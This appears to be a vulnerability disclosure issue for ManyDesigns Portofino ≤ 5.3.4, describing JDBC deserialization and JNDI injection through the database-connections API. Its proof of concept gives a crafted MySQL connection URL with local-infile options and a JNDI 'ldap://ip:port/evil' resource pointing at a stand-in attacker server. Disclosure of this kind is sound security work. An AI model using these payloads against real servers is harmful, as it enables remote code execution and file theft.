Vulnerability: JDBC Deserialization via mysql-connector and JNDI Can Lead to Remote Code Execution (RCE) and Arbitrary File Reads in Portofino ≤ 5.3.4 #754
Description
BUG_Author: R1ckyZ
Affected Version: Portofino ≤ 5.3.4
Vendor: ManyDesigns
Software: Portofino
Vulnerability Files:
-
upstairs/src/main/java/com/manydesigns/portofino/upstairs/actions/database/connections/ConnectionsAction.java -
portofino-model/src/main/java/com/manydesigns/portofino/model/database/JdbcConnectionProvider.java -
portofino-model/src/main/java/com/manydesigns/portofino/model/database/JndiConnectionProvider.java
Description:
API /api/portofino-upstairs/database/connections supports custom JDBC and JNDI connections. However, when user-provided parameters are directly used together with existing dependencies, it may lead to Remote Code Execution (RCE) and arbitrary file reads. For instance, JDBC connection attributes such as autoDeserialize, allowLoadLocalInfile, and allowUrlInLocalInfile can enable RCE or unauthorized file access, while JNDI connections may be exploited by pointing to malicious LDAP or RMI endpoints.
Proof of Concept:
- After logging into admin account, access
/portofino-upstairs/wizardto create a JDBC or JNDI connection.
- Enter the carefully crafted link into the Connection URL or JNDI resource field, then click Next to trigger the
createConnectionaction.
Connection URL: jdbc:mysql://ip:port/test?disableMariaDbDriver=true&allowLoadLocalInfile=true&allowUrlInLocalInfile=true
JNDI resource: ldap://ip:port/evil